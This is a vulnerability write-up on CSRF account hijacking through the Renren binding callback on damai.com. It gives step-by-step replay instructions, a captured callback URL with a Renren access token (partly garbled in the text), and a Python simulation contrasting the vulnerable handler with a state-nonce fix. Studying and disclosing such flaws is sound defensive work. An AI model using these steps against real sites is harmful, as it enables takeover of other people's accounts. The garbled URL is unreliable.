After studying the vulnerabilities described in http://www.bkjia.com/Article/201211/168278.html and http://www.bkjia.com/Article/201211/167652.html, we tested the authentication flow that several websites use to bind a third-party site account to a local account. The details differ from site to site, but the core is the same: the site obtains an access_token for the third-party account, and the request that hands that token back to the site is the one that matters. If that request is intercepted, it can be replayed in the browser of a different logged-in account (a CSRF), and that account becomes bound to the third-party account the attacker prepared. The binding is one-to-one: on most sites a given third-party account can be bound to only one local account of the same application.

Background of the vulnerability (see http://www.bkjia.com/Article/201211/167652.html): the authentication data returned to website A does not associate account A of website A with account C of the third-party website C. The intercepted data only proves that account C can be accessed on website C; it says nothing about which website-A session started the binding. So if account B of website A loads the intercepted data, account B is bound to account C, and whoever controls account C can log in to account B. This is account hijacking.

Simulated hijacking (Damai, damai.com, with Renren as the third-party site):

1. Prepare a fresh Damai account with no bindings. This is the account to be hijacked; log it in in browser 1.
2. Prepare a logged-in Renren account and a second Damai account (the attacker's). Use a separate browser (browser 2) so the two Damai sessions do not interfere with each other.
3. Point browser 2 at the Paros proxy with interception enabled, open "third-party site binding" in the attacker's Damai account and click "bind Renren account" next to Renren.
4. Step through the intercepted requests in Paros and copy the callback URL. In our test it was (reproduced as captured, with the middle of the parameter partly mangled):
http://connect.damai.cn/RenRen/Bind.aspx?_action=GetUser&data=%7b%22PkID%22%3a0%2c%22Code%22%3a0%2c%22CreateDate%22%3a%22%5c%2fDate(1357535393150)%5c%2f%22%2c%22LastModifyDate%22%3a%22%5c%2fDate(1357535393150)%5c%2f%22%2c%22ThirdPartySign%22%3a6%2c%22Other_UID%22%3a%22505316817%2c%22Other_Token%22%3a%22%7c6.0968a42412b566c72891194dfbfdb3f3.2592000.1360130400-505316817%22%2c%22Other_TokenSecret%22%3anull%2c%22Other_NickName%22%3a%22%e6%9d%9c%e8%85%be%22%2c%22Other_Gender%22%3a1%2c%22Other_Description%22%3anull%2c%22Oth California%22%2c%22Other_Profile_Url%22%3anull%2c%22Other_Verified%22%3afalse%2c%22Other_CityID%22%3a0%2c%22Other_Location%22%3anull%2c%hour%22%A0%2c%22Other_FriendsCount%22%3a0%2c%22Other_StatusesCount%22%3a0%2c%22Other_FavouritesCount%22%3a0%2c%22Other_CreateDate%22%3a%22%5c%2fDate(-62135596800000)%5c%2f%22%2c%22Other_LoginUser%22%3anull%2c%22Other_Password%22%3anull%2c%22IsRandomAccount%22%3a0%2c%22Oauth_Version%22%3a2%2c%Login%22%3anull%2c%22Expires_In%22%3a%22%5c%2fDate(1360130399150)%5c%2f%22%7d
The data parameter is URL-encoded JSON describing the Renren identity: Other_UID, Other_Token (the access token), Other_NickName, Oauth_Version 2, Expires_In and so on. Nothing in it ties the request to the Damai session that started the binding, and the Renren access token itself travels in the query string of a GET request. (If the site answers "this account has already been bound by another account", the Renren account is already bound to some Damai account; use an unbound Renren account or unbind it first.)
5. Paste the copied URL into browser 1, where the Damai account from step 1 is logged in.
6. The attack is complete: the account from step 1 is now bound to the attacker's Renren account.

Proof of vulnerability: log on to damai.com with the Renren account that was bound, and you are logged in to the hijacked Damai account.

Solution: see the repair suggestions given in "Youku has the risk of account hijacking".
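The flaw in the binding flow above, as an added simulation in Python that is not code from the original write-up or from Damai or Renren (the endpoint name, account names, UID and token are constructed placeholders): the vulnerable handler binds whatever Renren identity the callback carries to whatever Damai session loads it, exactly as in step 5, while the hardened handler issues a single-use, per-session state nonce when the user clicks "bind" and rejects any callback that does not echo that nonce back from the same session.

```python
"""Simulation of a third-party account-binding callback.

Added illustration only, not Damai's or Renren's code.  The vulnerable
mode reproduces the hijack from the write-up; the hardened mode ties the
callback to the session that started the binding with a state nonce.
"""
import hmac
import json
import secrets
from urllib.parse import parse_qs, urlencode, urlparse

# Hypothetical endpoint, shaped like the captured Bind.aspx?_action=GetUser URL.
BIND_URL = "http://connect.example.test/RenRen/Bind.aspx"


class BindingService:
    """In-memory stand-in for the site's 'bind third-party account' feature."""

    def __init__(self, require_state):
        self.require_state = require_state
        self.bindings = {}       # third-party UID -> site account (one-to-one)
        self.pending_state = {}  # site session -> nonce issued at bind start

    def start_bind(self, session_user):
        """Called when the logged-in user clicks 'bind Renren account'.
        Returns the nonce the third party must echo back in the callback."""
        state = secrets.token_urlsafe(32)
        self.pending_state[session_user] = state
        return state

    def bind_callback(self, session_user, url):
        """The GetUser callback.  `session_user` is whoever is logged in to
        the site in the browser that loads `url` (the victim, in the attack)."""
        qs = parse_qs(urlparse(url).query)
        if qs.get("_action", [None])[0] != "GetUser":
            return "rejected: unknown action"
        data = json.loads(qs["data"][0])
        uid = str(data["Other_UID"])
        if self.require_state:
            # pop(): the nonce is single-use, so a replayed URL fails too.
            expected = self.pending_state.pop(session_user, None)
            given = qs.get("state", [""])[0]
            if expected is None or not hmac.compare_digest(expected, given):
                return "rejected: state mismatch"
        owner = self.bindings.get(uid)
        if owner is not None and owner != session_user:
            return "rejected: this account has already been bound by another account"
        self.bindings[uid] = session_user
        return "bound"

    def login_via_third_party(self, uid):
        """'Log on with Renren': returns the site account bound to this UID."""
        return self.bindings.get(str(uid))


def make_callback_url(uid, token, state=None):
    """Constructed callback URL mimicking the one captured in Paros."""
    data = {"Other_UID": uid, "Other_Token": token, "Oauth_Version": 2}
    params = {"_action": "GetUser", "data": json.dumps(data)}
    if state is not None:
        params["state"] = state
    return BIND_URL + "?" + urlencode(params)


def run_attack(require_state):
    """Attacker 'mallory' (constructed Renren UID 10001) starts a binding in her
    own session, captures her callback URL and loads it in the browser where
    'victim' is logged in.  Returns (callback result, who Renren UID 10001
    now logs in as)."""
    svc = BindingService(require_state)
    state = svc.start_bind("mallory")
    captured = make_callback_url("10001", "constructed-token", state)
    result = svc.bind_callback("victim", captured)  # step 5 of the write-up
    return result, svc.login_via_third_party("10001")


if __name__ == "__main__":
    print("vulnerable:", run_attack(False))  # ('bound', 'victim')
    print("hardened:  ", run_attack(True))   # ('rejected: state mismatch', None)
```

The hardened path is the OAuth 2.0 state parameter used as an anti-CSRF token: the nonce lives in the server-side session of the user who clicked "bind", so a URL captured from the attacker's session carries a nonce the victim's session never issued, and popping it on first use also stops the legitimate user's own URL from being replayed. Independently of the state check, a callback that carries the third-party access token in a GET query string should be replaced by a server-side exchange of a short-lived code, so the token never appears in browser history, proxy logs or Referer headers.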